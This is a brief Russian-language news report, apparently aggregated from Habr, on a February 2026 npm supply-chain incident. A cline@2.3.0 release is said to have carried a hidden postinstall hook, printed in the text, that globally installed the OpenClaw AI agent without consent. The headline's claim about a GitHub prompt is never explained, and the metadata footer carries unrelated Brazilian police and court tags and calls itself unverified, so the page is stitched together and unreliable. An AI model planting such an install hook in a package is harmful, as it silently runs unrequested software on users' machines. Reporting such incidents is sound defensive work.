## Операция 'Под прикрытием': Как один промпт в заголовке на GitHub привел к взлому 4000 компьютеров
17 февраля 2026 года в репозитории npm была опубликована версия cline@2.3.0. Внешне пакет ничем не отличался от предыдущего, исполняемый файл был идентичен байт в байт. Однако в файле package.json была добавлена одна скрытая строка: "postinstall": "npm install -g openclaw@latest". В течение следующих восьми часов каждый разработчик, устанавливавший или обновлявший Cline, невольно глобально устанавливал OpenClaw — автономный ИИ-агент с полным доступом к системе, который инсталлировался без запроса и согласия пользователя. Пакет был скачан около 4000 раз до того, как его удалили из общего доступа. Инцидент демонстрирует уязвимость цепочек поставок ПО и легкость, с которой злоумышленники могут внедрять вредоносный код через доверенные репозитории, используя механизмы автоматической установки зависимостей.
---
- **Source**: Habr
- **Sector**: The Network
- **Tags**: supremo tribunal federal, polícia federal, procuradoria-geral da república, operação misericórdia, macapá
- **Credibility**: unverified
- **Published**: 2026-03-07T09:38:56.985Z
- **ID**: 2909
- **URL**: https://whisperx.ai/ru/intel/2909